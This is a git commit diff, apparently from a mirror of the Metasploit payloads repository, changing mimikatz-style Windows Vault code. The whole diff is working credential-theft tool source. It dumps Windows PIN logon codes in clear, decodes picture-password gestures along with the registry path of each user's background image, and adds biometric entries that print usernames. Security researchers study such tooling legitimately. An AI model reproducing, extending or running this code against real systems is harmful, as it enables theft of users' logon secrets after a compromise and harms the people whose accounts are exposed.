1
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-08 14:36:22 +01:00

Merge from source r105

This commit is contained in:
OJ 2014-03-04 11:30:59 +10:00
parent 2b2508b8c9
commit 386df98a08
2 changed files with 97 additions and 29 deletions

View File

@ -59,8 +59,9 @@ const VAULT_SCHEMA_HELPER schemaHelper[] = {
{{{0x03e0e35be, 0x1b77, 0x43e7, {0xb8, 0x73, 0xae, 0xd9, 0x01, 0xb6, 0x27, 0x5b}}, L"Domain Password"}, NULL},
{{{0x0e69d7838, 0x91b5, 0x4fc9, {0x89, 0xd5, 0x23, 0x0d, 0x4d, 0x4c, 0xc2, 0xbc}}, L"Domain Certificate"}, NULL},
{{{0x03c886ff3, 0x2669, 0x4aa2, {0xa8, 0xfb, 0x3f, 0x67, 0x59, 0xa7, 0x75, 0x48}}, L"Domain Extended"}, NULL},
{{{0x0b2e033f5, 0x5fde, 0x450d, {0xa1, 0xbd, 0x37, 0x91, 0xf4, 0x65, 0x72, 0x0c}}, L"Pin Logon"}, kuhl_m_vault_list_descItem_PINLogonOrPicturePassword},
{{{0x0b4b8a12b, 0x183d, 0x4908, {0x95, 0x59, 0xbd, 0x8b, 0xce, 0x72, 0xb5, 0x8a}}, L"Picture Password"}, kuhl_m_vault_list_descItem_PINLogonOrPicturePassword},
{{{0x0b2e033f5, 0x5fde, 0x450d, {0xa1, 0xbd, 0x37, 0x91, 0xf4, 0x65, 0x72, 0x0c}}, L"Pin Logon"}, kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric},
{{{0x0b4b8a12b, 0x183d, 0x4908, {0x95, 0x59, 0xbd, 0x8b, 0xce, 0x72, 0xb5, 0x8a}}, L"Picture Password"}, kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric},
{{{0x0fec87291, 0x14f6, 0x40b6, {0xbd, 0x98, 0x7f, 0xf2, 0x45, 0x98, 0x6b, 0x26}}, L"Biometric"}, kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric},
};
NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
@ -131,7 +132,7 @@ NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
kprintf(L"\n\t\t*** %s ***\n", schemaHelper[l].guidString.text);
if(schemaHelper[l].helper)
{
schemaHelper[l].helper(&items8[j], ((status == STATUS_SUCCESS) && pItem8) ? pItem8 : NULL, TRUE);
schemaHelper[l].helper(&schemaHelper[l].guidString, &items8[j], ((status == STATUS_SUCCESS) && pItem8) ? pItem8 : NULL, TRUE);
kprintf(L"\n");
}
break;
@ -153,13 +154,15 @@ NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePassword(PVOID enumItem, PVOID getItem, BOOL is8)
void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(const VAULT_GUID_STRING * pGuidString, PVOID enumItem, PVOID getItem, BOOL is8)
{
PVAULT_ITEM_8 enumItem8 = (PVAULT_ITEM_8) enumItem, getItem8 = (PVAULT_ITEM_8) getItem;
PWSTR name, domain;
PWSTR name, domain, sid, bgPath = NULL;
UNICODE_STRING uString;
DWORD i;
DWORD i, dwError, szNeeded;
PVAULT_PICTURE_PASSWORD_ELEMENT pElements;
PVAULT_BIOMETRIC_ELEMENT bElements;
HKEY hPicturePassword, hUserPicturePassword;
if(enumItem8->Identity && (enumItem8->Identity->Type == ElementType_ByteArray))
{
@ -169,6 +172,41 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePassword(PVOID enumIte
LocalFree(name);
LocalFree(domain);
} else PRINT_ERROR_AUTO(L"kull_m_token_getNameDomainFromSID");
if(pGuidString->guid.Data1 == 0x0b4b8a12b)
{
dwError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\LogonUI\\PicturePassword", 0, KEY_ENUMERATE_SUB_KEYS, &hPicturePassword);
if(dwError == STATUS_SUCCESS)
{
if(ConvertSidToStringSid((PSID) enumItem8->Identity->data.ByteArray.Value, &sid))
{
dwError = RegOpenKeyEx(hPicturePassword, sid, 0, KEY_QUERY_VALUE, &hUserPicturePassword);
if(dwError == STATUS_SUCCESS)
{
dwError = RegQueryValueEx(hUserPicturePassword, L"bgPath", NULL, NULL, NULL, &szNeeded);
if(dwError == STATUS_SUCCESS)
{
if(bgPath = (PWSTR) LocalAlloc(LPTR, szNeeded))
{
dwError = RegQueryValueEx(hUserPicturePassword, L"bgPath", NULL, NULL, (LPBYTE) bgPath, &szNeeded);
if(dwError != STATUS_SUCCESS)
{
PRINT_ERROR(L"RegQueryValueEx 2 : %08x\n", dwError);
bgPath = (PWSTR) LocalFree(bgPath);
}
}
}
else PRINT_ERROR(L"RegQueryValueEx 1 : %08x\n", dwError);
RegCloseKey(hUserPicturePassword);
}
else PRINT_ERROR(L"RegOpenKeyEx SID : %08x\n", dwError);
LocalFree(sid);
}
else PRINT_ERROR_AUTO(L"ConvertSidToStringSid");
RegCloseKey(hPicturePassword);
}
else PRINT_ERROR(L"RegOpenKeyEx PicturePassword : %08x\n", dwError);
}
}
if(getItem8 && getItem8->Authenticator && (getItem8->Authenticator->Type == ElementType_ByteArray))
@ -185,12 +223,23 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePassword(PVOID enumIte
if(enumItem8->Properties && (enumItem8->cbProperties > 0) && enumItem8->Properties[0])
{
switch(pGuidString->guid.Data1)
{
case 0x0b2e033f5: // pin
if(enumItem8->Properties[0]->Type == ElementType_UnsignedShort)
kprintf(L"\t\tPIN Code : %04hu\n", enumItem8->Properties[0]->data.UnsignedShort);
else if(enumItem8->Properties[0]->Type == ElementType_ByteArray)
break;
case 0x0b4b8a12b: // picture
if(enumItem8->Properties[0]->Type == ElementType_ByteArray)
{
pElements = (PVAULT_PICTURE_PASSWORD_ELEMENT) enumItem8->Properties[0]->data.ByteArray.Value;
if(bgPath)
{
kprintf(L"\t\tBackground path : %s\n", bgPath);
LocalFree(bgPath);
}
kprintf(L"\t\tPicture password (grid is 150*100)\n");
for(i = 0; i < 3; i++)
{
kprintf(L"\t\t [%u] ", i);
@ -210,6 +259,18 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePassword(PVOID enumIte
}
kprintf(L"\n");
}
kprintf(L"\n");
}
break;
case 0x0fec87291: // biometric
if(enumItem8->Properties[0]->Type == ElementType_ByteArray)
{
bElements = (PVAULT_BIOMETRIC_ELEMENT) enumItem8->Properties[0]->data.ByteArray.Value;
kprintf(L"\t\tUsername [%2u] : %.*s\n", bElements->unk0, bElements->usernameLength - 1, bElements->username);
}
break;
default:
kprintf(L"todo ?\n");
}
}
}

View File

@ -18,14 +18,14 @@ void kuhl_m_vault_list_descVault(HANDLE hVault);
void kuhl_m_vault_list_descItemData(struct _VAULT_ITEM_DATA * pData);
NTSTATUS kuhl_m_vault_cred(int argc, wchar_t * argv[]);
void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePassword(PVOID enumItem, PVOID getItem, BOOL is8);
typedef void (CALLBACK * PSCHEMA_HELPER_FUNC) (PVOID enumItem, PVOID getItem, BOOL is8);
typedef struct _VAULT_GUID_STRING {
const GUID guid;
const wchar_t * text;
} VAULT_GUID_STRING, *PVAULT_GUID_STRING;
void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(const VAULT_GUID_STRING * pGuidString, PVOID enumItem, PVOID getItem, BOOL is8);
typedef void (CALLBACK * PSCHEMA_HELPER_FUNC) (const VAULT_GUID_STRING * pGuidString, PVOID enumItem, PVOID getItem, BOOL is8);
typedef struct _VAULT_SCHEMA_HELPER {
VAULT_GUID_STRING guidString;
PSCHEMA_HELPER_FUNC helper;
@ -61,6 +61,13 @@ typedef struct _VAULT_PICTURE_PASSWORD_ELEMENT {
};
} VAULT_PICTURE_PASSWORD_ELEMENT, *PVAULT_PICTURE_PASSWORD_ELEMENT;
typedef struct _VAULT_BIOMETRIC_ELEMENT {
ULONG usernameLength;
ULONG usernameMaxLength;
ULONG unk0;
wchar_t username[ANYSIZE_ARRAY];
} VAULT_BIOMETRIC_ELEMENT, *PVAULT_BIOMETRIC_ELEMENT;
typedef enum _VAULT_INFORMATION_TYPE {
VaultInformation_Name = 1,
VaultInformation_Path_7 = 8,